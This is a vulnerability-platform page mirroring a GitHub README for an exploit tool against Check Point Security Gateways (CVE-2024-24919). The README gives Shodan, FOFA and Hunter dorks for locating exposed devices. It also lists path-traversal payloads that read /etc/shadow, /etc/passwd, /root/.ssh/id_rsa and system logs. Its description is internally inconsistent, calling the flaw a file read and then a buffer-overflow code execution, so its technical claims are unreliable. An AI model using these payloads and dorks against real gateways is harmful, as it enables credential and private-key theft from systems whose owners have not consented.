漏洞平台

POC详情： 6238d21bd996d2567845f81d1b34e490a4791098

来源

https://github.com/GoatSecurity/CVE-2024-24919

关联漏洞

标题： Check Point Security Gateways 安全漏洞 (CVE-2024-24919)
描述：Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。 Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。

描述

CVE-2024-24919 exploit

介绍

## **Check Point Security Gateway RCE Exploit Tool (CVE-2024-24919)**

### **Overview**

This repository contains a tool for exploiting the **CVE-2024-24919** vulnerability in Check Point Security Gateways. The tool is a multi-scanner that can identify vulnerable devices and a single-target exploit that can take full control of the affected device.

**CVE-2024-24919** is a high-severity information disclosure vulnerability that allows an attacker to remotely read arbitrary files on a Check Point Security Gateway. This vulnerability can be exploited to steal sensitive information, such as passwords and configuration files.

**Disclaimer:**

This tool is provided for educational purposes only. It should not be used to attack vulnerable systems without the explicit consent of the owner. The authors of this tool are not responsible for any damages that may result from its use.

### **How it works**

The exploit works by sending a specially crafted HTTP request to the vulnerable device. The request triggers a buffer overflow in the device's firmware, which allows the attacker to execute arbitrary code. The exploit can then be used to take full control of the device.

### **Requirements**

* Python 3
* colorama
* requests

### **Installation**

```
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
```

### **Usage**

You can scan singel target or multi!

```
python cve-2024-24919.py
```



### **Dorks **

```
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"
```

### ** Tool ScreenShot **
![ss](https://github.com/GoatSecurity/CVE-2024-24919/assets/153397256/c0f2dd29-a464-4a24-9356-f0db418c9235)


$ Tool paths :
        ```
        
        'aCSHELL/../../../../../../../../../../../etc/passwd',
        
        'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
        
        'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
        
        'aCSHELL/../../../../../../../../../../../var/log/syslog',
        
        'aCSHELL/../../../../../../../../../../../var/log/auth.log',
        
        #'aCSHELL/../../../../../../../../../../../var/log/messages',
        
        'aCSHELL/../../../../../../../../../../../etc/group',
        
        'aCSHELL/../../../../../../../../../../../etc/shadow',
        
        'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
        
        'aCSHELL/../../../../../../../../../../../etc/hostname',
        
        'aCSHELL/../../../../../../../../../../../etc/hosts',
        
        'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```

文件快照


 [4.0K]  /data/pocs/6238d21bd996d2567845f81d1b34e490a4791098
├── [4.2K]  CVE-2024-24919.py
├── [2.7K]  README.md
└── [  18]  requirements.txt

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。